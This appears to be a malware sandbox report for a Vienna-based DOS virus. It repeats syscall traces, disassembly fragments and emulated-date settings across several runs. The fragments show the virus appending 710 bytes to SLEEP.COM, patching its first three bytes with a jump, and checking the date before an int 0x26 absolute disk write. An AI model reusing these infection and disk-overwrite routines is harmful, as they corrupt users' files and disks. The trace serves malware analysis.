Sample viewer

vx.netlux.org/Virus.DOS.Vienna-based

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:43:20.341688549Z 48 PC: 12a6b | Get DOS version
2018-12-17T22:43:20.343249716Z 47 PC: 12a77 | Get disk transfer address
2018-12-17T22:43:20.344232704Z 26 PC: 12a8a | Set disk transfer address
2018-12-17T22:43:20.345260307Z 42 PC: 12a9a | Get date 0x12a9a: cmp cx, 0x7cb
0x12a9e: jge 0x12aa3
0x12aa0: jmp 0x12ace
0x12aa2: nop
0x12aa3: mov ah, 0x2a
0x12aa5: int 0x21
0x12aa7: cmp dh, 6
0x12aaa: jge 0x12aaf
0x12aac: jmp 0x12ace
0x12aae: nop
0x12aaf: mov ah, 0x2a
0x12ab1: int 0x21
0x12ab3: cmp dl, 0x16
0x12ab6: jge 0x12abb
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1
0x12abd: mov cx, 1
0x12ac0: mov dx, 0
0x12ac3: mov ds, word ptr [di + 0x37]
2018-12-17T22:43:20.348313003Z 42 PC: 12aa7 | Get date 0x12aa7: cmp dh, 6
0x12aaa: jge 0x12aaf
0x12aac: jmp 0x12ace
0x12aae: nop
0x12aaf: mov ah, 0x2a
0x12ab1: int 0x21
0x12ab3: cmp dl, 0x16
0x12ab6: jge 0x12abb
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1
0x12abd: mov cx, 1
0x12ac0: mov dx, 0
0x12ac3: mov ds, word ptr [di + 0x37]
0x12ac6: mov bx, word ptr [di + 0x63]
0x12ac9: int 0x26
0x12acb: jmp 0x12ace
0x12acd: nop
0x12ace: pop si
0x12acf: push si
2018-12-17T22:43:20.350471661Z 42 PC: 12ab3 | Get date 0x12ab3: cmp dl, 0x16
0x12ab6: jge 0x12abb
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1
0x12abd: mov cx, 1
0x12ac0: mov dx, 0
0x12ac3: mov ds, word ptr [di + 0x37]
0x12ac6: mov bx, word ptr [di + 0x63]
0x12ac9: int 0x26
0x12acb: jmp 0x12ace
0x12acd: nop
0x12ace: pop si
0x12acf: push si
0x12ad0: add si, 0x31
0x12ad4: lodsb al, byte ptr [si]
0x12ad5: mov cx, 0x8000
0x12ad8: repne scasb al, byte ptr es:[di]
0x12ada: mov cx, 4
0x12add: lodsb al, byte ptr [si]
2018-12-17T22:43:20.352719679Z 78 PC: 12b51 | Find first file
2018-12-17T22:43:20.358942496Z 67 PC: 12b8f | Get or set file attributes
2018-12-17T22:43:20.365676248Z 67 PC: 12ba2 | Get or set file attributes
2018-12-17T22:43:20.385123626Z 61 PC: 12bad | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:43:20.391993058Z 87 PC: 12bb9 | Get or set file date and time
2018-12-17T22:43:20.394393031Z 44 PC: 12bc5 | Get time 0x12bc5: and dh, 7
0x12bc8: jmp 0x12bcb
0x12bca: nop
0x12bcb: mov ah, 0x3f
0x12bcd: mov cx, 3
0x12bd0: mov dx, 0x21
0x12bd3: nop
0x12bd4: add dx, si
0x12bd6: int 0x21
0x12bd8: jb 0x12c2f
0x12bda: cmp ax, 3
0x12bdd: jne 0x12c2f
0x12bdf: mov ax, 0x4202
0x12be2: mov cx, 0
0x12be5: mov dx, 0
0x12be8: int 0x21
0x12bea: jb 0x12c2f
0x12bec: mov cx, ax
0x12bee: sub ax, 3
0x12bf1: mov word ptr [si + 0x25], ax
2018-12-17T22:43:20.396488139Z 63 PC: 12bd8 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:43:20.402629505Z 66 PC: 12bea | Move file pointer
2018-12-17T22:43:20.40429374Z 64 PC: 12c0e | Write file or device (Write 710 bytes on handle 5)
2018-12-17T22:43:20.411964246Z 66 PC: 12c20 | Move file pointer
2018-12-17T22:43:20.412919306Z 64 PC: 12c2f | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:43:20.417506657Z 87 PC: 12c44 | Get or set file date and time
2018-12-17T22:43:20.418852209Z 62 PC: 12c48 | Close file
2018-12-17T22:43:20.426270196Z 67 PC: 12c57 | Get or set file attributes
2018-12-17T22:43:20.439986721Z 26 PC: 12c64 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7846,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:02:50.701056102Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:02:50.703079929Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:02:50.704038813Z 26 PC: 12a8a | Set disk transfer address
2018-12-25T12:02:50.704983417Z 42 PC: 12a9a | Get date 0x12a9a: cmp cx, 0x7cb
0x12a9e: jge 0x12aa3
0x12aa0: jmp 0x12ace
0x12aa2: nop
0x12aa3: mov ah, 0x2a
0x12aa5: int 0x21
0x12aa7: cmp dh, 6
0x12aaa: jge 0x12aaf
0x12aac: jmp 0x12ace
0x12aae: nop
0x12aaf: mov ah, 0x2a
0x12ab1: int 0x21
0x12ab3: cmp dl, 0x16
0x12ab6: jge 0x12abb
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1
0x12abd: mov cx, 1
0x12ac0: mov dx, 0
0x12ac3: mov ds, word ptr [di + 0x37]
2018-12-25T12:02:50.707959492Z 78 PC: 12b51 | Find first file
2018-12-25T12:02:50.71396248Z 67 PC: 12b8f | Get or set file attributes
2018-12-25T12:02:50.719380541Z 67 PC: 12ba2 | Get or set file attributes
2018-12-25T12:02:50.736006406Z 61 PC: 12bad | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:02:50.742565097Z 87 PC: 12bb9 | Get or set file date and time
2018-12-25T12:02:50.74382411Z 44 PC: 12bc5 | Get time 0x12bc5: and dh, 7
0x12bc8: jmp 0x12bcb
0x12bca: nop
0x12bcb: mov ah, 0x3f
0x12bcd: mov cx, 3
0x12bd0: mov dx, 0x21
0x12bd3: nop
0x12bd4: add dx, si
0x12bd6: int 0x21
0x12bd8: jb 0x12c2f
0x12bda: cmp ax, 3
0x12bdd: jne 0x12c2f
0x12bdf: mov ax, 0x4202
0x12be2: mov cx, 0
0x12be5: mov dx, 0
0x12be8: int 0x21
0x12bea: jb 0x12c2f
0x12bec: mov cx, ax
0x12bee: sub ax, 3
0x12bf1: mov word ptr [si + 0x25], ax
2018-12-25T12:02:50.746323569Z 63 PC: 12bd8 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:02:50.753139162Z 66 PC: 12bea | Move file pointer
2018-12-25T12:02:50.755941921Z 64 PC: 12c0e | Write file or device (Write 710 bytes on handle 5)
2018-12-25T12:02:50.764848223Z 66 PC: 12c20 | Move file pointer
2018-12-25T12:02:50.767015414Z 64 PC: 12c2f | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:02:50.77333049Z 87 PC: 12c44 | Get or set file date and time
2018-12-25T12:02:50.77464787Z 62 PC: 12c48 | Close file
2018-12-25T12:02:50.786564747Z 67 PC: 12c57 | Get or set file attributes
2018-12-25T12:02:50.796458721Z 26 PC: 12c64 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1995,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7846,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:02:50.785373127Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:02:50.787051869Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:02:50.788733689Z 26 PC: 12a8a | Set disk transfer address
2018-12-25T12:02:50.789742492Z 42 PC: 12a9a | Get date 0x12a9a: cmp cx, 0x7cb
0x12a9e: jge 0x12aa3
0x12aa0: jmp 0x12ace
0x12aa2: nop
0x12aa3: mov ah, 0x2a
0x12aa5: int 0x21
0x12aa7: cmp dh, 6
0x12aaa: jge 0x12aaf
0x12aac: jmp 0x12ace
0x12aae: nop
0x12aaf: mov ah, 0x2a
0x12ab1: int 0x21
0x12ab3: cmp dl, 0x16
0x12ab6: jge 0x12abb
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1
0x12abd: mov cx, 1
0x12ac0: mov dx, 0
0x12ac3: mov ds, word ptr [di + 0x37]
2018-12-25T12:02:50.792041756Z 42 PC: 12aa7 | Get date 0x12aa7: cmp dh, 6
0x12aaa: jge 0x12aaf
0x12aac: jmp 0x12ace
0x12aae: nop
0x12aaf: mov ah, 0x2a
0x12ab1: int 0x21
0x12ab3: cmp dl, 0x16
0x12ab6: jge 0x12abb
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1
0x12abd: mov cx, 1
0x12ac0: mov dx, 0
0x12ac3: mov ds, word ptr [di + 0x37]
0x12ac6: mov bx, word ptr [di + 0x63]
0x12ac9: int 0x26
0x12acb: jmp 0x12ace
0x12acd: nop
0x12ace: pop si
0x12acf: push si
2018-12-25T12:02:50.793950697Z 78 PC: 12b51 | Find first file
2018-12-25T12:02:50.797847656Z 67 PC: 12b8f | Get or set file attributes
2018-12-25T12:02:50.801592214Z 67 PC: 12ba2 | Get or set file attributes
2018-12-25T12:02:50.818997632Z 61 PC: 12bad | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:02:50.826438339Z 87 PC: 12bb9 | Get or set file date and time
2018-12-25T12:02:50.827856966Z 44 PC: 12bc5 | Get time 0x12bc5: and dh, 7
0x12bc8: jmp 0x12bcb
0x12bca: nop
0x12bcb: mov ah, 0x3f
0x12bcd: mov cx, 3
0x12bd0: mov dx, 0x21
0x12bd3: nop
0x12bd4: add dx, si
0x12bd6: int 0x21
0x12bd8: jb 0x12c2f
0x12bda: cmp ax, 3
0x12bdd: jne 0x12c2f
0x12bdf: mov ax, 0x4202
0x12be2: mov cx, 0
0x12be5: mov dx, 0
0x12be8: int 0x21
0x12bea: jb 0x12c2f
0x12bec: mov cx, ax
0x12bee: sub ax, 3
0x12bf1: mov word ptr [si + 0x25], ax
2018-12-25T12:02:50.830520124Z 63 PC: 12bd8 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:02:50.837433919Z 66 PC: 12bea | Move file pointer
2018-12-25T12:02:50.838825705Z 64 PC: 12c0e | Write file or device (Write 710 bytes on handle 5)
2018-12-25T12:02:50.848678708Z 66 PC: 12c20 | Move file pointer
2018-12-25T12:02:50.850088179Z 64 PC: 12c2f | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:02:50.857797687Z 87 PC: 12c44 | Get or set file date and time
2018-12-25T12:02:50.860633087Z 62 PC: 12c48 | Close file
2018-12-25T12:02:50.869661342Z 67 PC: 12c57 | Get or set file attributes
2018-12-25T12:02:50.880885087Z 26 PC: 12c64 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7846,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:02:50.988829643Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:02:50.9908612Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:02:50.993030807Z 26 PC: 12a8a | Set disk transfer address
2018-12-25T12:02:50.994301125Z 42 PC: 12a9a | Get date 0x12a9a: cmp cx, 0x7cb
0x12a9e: jge 0x12aa3
0x12aa0: jmp 0x12ace
0x12aa2: nop
0x12aa3: mov ah, 0x2a
0x12aa5: int 0x21
0x12aa7: cmp dh, 6
0x12aaa: jge 0x12aaf
0x12aac: jmp 0x12ace
0x12aae: nop
0x12aaf: mov ah, 0x2a
0x12ab1: int 0x21
0x12ab3: cmp dl, 0x16
0x12ab6: jge 0x12abb
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1
0x12abd: mov cx, 1
0x12ac0: mov dx, 0
0x12ac3: mov ds, word ptr [di + 0x37]
2018-12-25T12:02:50.996866119Z 78 PC: 12b51 | Find first file
2018-12-25T12:02:51.004422302Z 67 PC: 12b8f | Get or set file attributes
2018-12-25T12:02:51.009665132Z 67 PC: 12ba2 | Get or set file attributes
2018-12-25T12:02:51.642133349Z 61 PC: 12bad | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:02:51.650301989Z 87 PC: 12bb9 | Get or set file date and time
2018-12-25T12:02:51.652128706Z 44 PC: 12bc5 | Get time 0x12bc5: and dh, 7
0x12bc8: jmp 0x12bcb
0x12bca: nop
0x12bcb: mov ah, 0x3f
0x12bcd: mov cx, 3
0x12bd0: mov dx, 0x21
0x12bd3: nop
0x12bd4: add dx, si
0x12bd6: int 0x21
0x12bd8: jb 0x12c2f
0x12bda: cmp ax, 3
0x12bdd: jne 0x12c2f
0x12bdf: mov ax, 0x4202
0x12be2: mov cx, 0
0x12be5: mov dx, 0
0x12be8: int 0x21
0x12bea: jb 0x12c2f
0x12bec: mov cx, ax
0x12bee: sub ax, 3
0x12bf1: mov word ptr [si + 0x25], ax
2018-12-25T12:02:51.654753713Z 63 PC: 12bd8 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:02:51.662822915Z 66 PC: 12bea | Move file pointer
2018-12-25T12:02:51.664435598Z 64 PC: 12c0e | Write file or device (Write 710 bytes on handle 5)
2018-12-25T12:02:51.674397435Z 66 PC: 12c20 | Move file pointer
2018-12-25T12:02:51.676390573Z 64 PC: 12c2f | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:02:51.684076756Z 87 PC: 12c44 | Get or set file date and time
2018-12-25T12:02:51.686076066Z 62 PC: 12c48 | Close file
2018-12-25T12:02:51.694911989Z 67 PC: 12c57 | Get or set file attributes
2018-12-25T12:02:51.706429083Z 26 PC: 12c64 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":6,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7846,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:02:51.01123979Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:02:51.013544907Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:02:51.015631402Z 26 PC: 12a8a | Set disk transfer address
2018-12-25T12:02:51.017323116Z 42 PC: 12a9a | Get date 0x12a9a: cmp cx, 0x7cb
0x12a9e: jge 0x12aa3
0x12aa0: jmp 0x12ace
0x12aa2: nop
0x12aa3: mov ah, 0x2a
0x12aa5: int 0x21
0x12aa7: cmp dh, 6
0x12aaa: jge 0x12aaf
0x12aac: jmp 0x12ace
0x12aae: nop
0x12aaf: mov ah, 0x2a
0x12ab1: int 0x21
0x12ab3: cmp dl, 0x16
0x12ab6: jge 0x12abb
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1
0x12abd: mov cx, 1
0x12ac0: mov dx, 0
0x12ac3: mov ds, word ptr [di + 0x37]
2018-12-25T12:02:51.020189931Z 78 PC: 12b51 | Find first file
2018-12-25T12:02:51.028447042Z 67 PC: 12b8f | Get or set file attributes
2018-12-25T12:02:51.032886268Z 67 PC: 12ba2 | Get or set file attributes
2018-12-25T12:02:51.642699631Z 61 PC: 12bad | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:02:51.652596017Z 87 PC: 12bb9 | Get or set file date and time
2018-12-25T12:02:51.653902078Z 44 PC: 12bc5 | Get time 0x12bc5: and dh, 7
0x12bc8: jmp 0x12bcb
0x12bca: nop
0x12bcb: mov ah, 0x3f
0x12bcd: mov cx, 3
0x12bd0: mov dx, 0x21
0x12bd3: nop
0x12bd4: add dx, si
0x12bd6: int 0x21
0x12bd8: jb 0x12c2f
0x12bda: cmp ax, 3
0x12bdd: jne 0x12c2f
0x12bdf: mov ax, 0x4202
0x12be2: mov cx, 0
0x12be5: mov dx, 0
0x12be8: int 0x21
0x12bea: jb 0x12c2f
0x12bec: mov cx, ax
0x12bee: sub ax, 3
0x12bf1: mov word ptr [si + 0x25], ax
2018-12-25T12:02:51.655594519Z 63 PC: 12bd8 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:02:51.660447302Z 66 PC: 12bea | Move file pointer
2018-12-25T12:02:51.661498532Z 64 PC: 12c0e | Write file or device (Write 710 bytes on handle 5)
2018-12-25T12:02:51.667046172Z 66 PC: 12c20 | Move file pointer
2018-12-25T12:02:51.668959453Z 64 PC: 12c2f | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:02:51.676232336Z 87 PC: 12c44 | Get or set file date and time
2018-12-25T12:02:51.677634714Z 62 PC: 12c48 | Close file
2018-12-25T12:02:51.68757828Z 67 PC: 12c57 | Get or set file attributes
2018-12-25T12:02:51.698429951Z 26 PC: 12c64 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7846,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:02:51.082169605Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:02:51.083748992Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:02:51.085035008Z 26 PC: 12a8a | Set disk transfer address
2018-12-25T12:02:51.086004601Z 42 PC: 12a9a | Get date 0x12a9a: cmp cx, 0x7cb
0x12a9e: jge 0x12aa3
0x12aa0: jmp 0x12ace
0x12aa2: nop
0x12aa3: mov ah, 0x2a
0x12aa5: int 0x21
0x12aa7: cmp dh, 6
0x12aaa: jge 0x12aaf
0x12aac: jmp 0x12ace
0x12aae: nop
0x12aaf: mov ah, 0x2a
0x12ab1: int 0x21
0x12ab3: cmp dl, 0x16
0x12ab6: jge 0x12abb
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1
0x12abd: mov cx, 1
0x12ac0: mov dx, 0
0x12ac3: mov ds, word ptr [di + 0x37]
2018-12-25T12:02:51.08853073Z 78 PC: 12b51 | Find first file
2018-12-25T12:02:51.094408363Z 67 PC: 12b8f | Get or set file attributes
2018-12-25T12:02:51.099704624Z 67 PC: 12ba2 | Get or set file attributes
2018-12-25T12:02:51.115962367Z 61 PC: 12bad | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:02:51.122453212Z 87 PC: 12bb9 | Get or set file date and time
2018-12-25T12:02:51.123630349Z 44 PC: 12bc5 | Get time 0x12bc5: and dh, 7
0x12bc8: jmp 0x12bcb
0x12bca: nop
0x12bcb: mov ah, 0x3f
0x12bcd: mov cx, 3
0x12bd0: mov dx, 0x21
0x12bd3: nop
0x12bd4: add dx, si
0x12bd6: int 0x21
0x12bd8: jb 0x12c2f
0x12bda: cmp ax, 3
0x12bdd: jne 0x12c2f
0x12bdf: mov ax, 0x4202
0x12be2: mov cx, 0
0x12be5: mov dx, 0
0x12be8: int 0x21
0x12bea: jb 0x12c2f
0x12bec: mov cx, ax
0x12bee: sub ax, 3
0x12bf1: mov word ptr [si + 0x25], ax
2018-12-25T12:02:51.126035101Z 63 PC: 12bd8 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:02:51.131965505Z 66 PC: 12bea | Move file pointer
2018-12-25T12:02:51.133872762Z 64 PC: 12c0e | Write file or device (Write 710 bytes on handle 5)
2018-12-25T12:02:51.142108474Z 66 PC: 12c20 | Move file pointer
2018-12-25T12:02:51.143443233Z 64 PC: 12c2f | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:02:51.149890982Z 87 PC: 12c44 | Get or set file date and time
2018-12-25T12:02:51.152605655Z 62 PC: 12c48 | Close file
2018-12-25T12:02:51.16024133Z 67 PC: 12c57 | Get or set file attributes
2018-12-25T12:02:51.1700135Z 26 PC: 12c64 | Set disk transfer address

{"DateBased":true,"Day":22,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7846,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:02:51.387110599Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:02:51.389224405Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:02:51.390346535Z 26 PC: 12a8a | Set disk transfer address
2018-12-25T12:02:51.391385128Z 42 PC: 12a9a | Get date 0x12a9a: cmp cx, 0x7cb
0x12a9e: jge 0x12aa3
0x12aa0: jmp 0x12ace
0x12aa2: nop
0x12aa3: mov ah, 0x2a
0x12aa5: int 0x21
0x12aa7: cmp dh, 6
0x12aaa: jge 0x12aaf
0x12aac: jmp 0x12ace
0x12aae: nop
0x12aaf: mov ah, 0x2a
0x12ab1: int 0x21
0x12ab3: cmp dl, 0x16
0x12ab6: jge 0x12abb
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1
0x12abd: mov cx, 1
0x12ac0: mov dx, 0
0x12ac3: mov ds, word ptr [di + 0x37]
2018-12-25T12:02:51.394126284Z 78 PC: 12b51 | Find first file
2018-12-25T12:02:51.401097161Z 67 PC: 12b8f | Get or set file attributes
2018-12-25T12:02:51.407227276Z 67 PC: 12ba2 | Get or set file attributes
2018-12-25T12:02:51.644037461Z 61 PC: 12bad | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:02:51.652586876Z 87 PC: 12bb9 | Get or set file date and time
2018-12-25T12:02:51.654560586Z 44 PC: 12bc5 | Get time 0x12bc5: and dh, 7
0x12bc8: jmp 0x12bcb
0x12bca: nop
0x12bcb: mov ah, 0x3f
0x12bcd: mov cx, 3
0x12bd0: mov dx, 0x21
0x12bd3: nop
0x12bd4: add dx, si
0x12bd6: int 0x21
0x12bd8: jb 0x12c2f
0x12bda: cmp ax, 3
0x12bdd: jne 0x12c2f
0x12bdf: mov ax, 0x4202
0x12be2: mov cx, 0
0x12be5: mov dx, 0
0x12be8: int 0x21
0x12bea: jb 0x12c2f
0x12bec: mov cx, ax
0x12bee: sub ax, 3
0x12bf1: mov word ptr [si + 0x25], ax
2018-12-25T12:02:51.657348658Z 63 PC: 12bd8 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:02:51.666148875Z 66 PC: 12bea | Move file pointer
2018-12-25T12:02:51.667756204Z 64 PC: 12c0e | Write file or device (Write 710 bytes on handle 5)
2018-12-25T12:02:51.67772387Z 66 PC: 12c20 | Move file pointer
2018-12-25T12:02:51.680972562Z 64 PC: 12c2f | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:02:51.68801116Z 87 PC: 12c44 | Get or set file date and time
2018-12-25T12:02:51.689653197Z 62 PC: 12c48 | Close file
2018-12-25T12:02:51.698425457Z 67 PC: 12c57 | Get or set file attributes
2018-12-25T12:02:51.705055363Z 26 PC: 12c64 | Set disk transfer address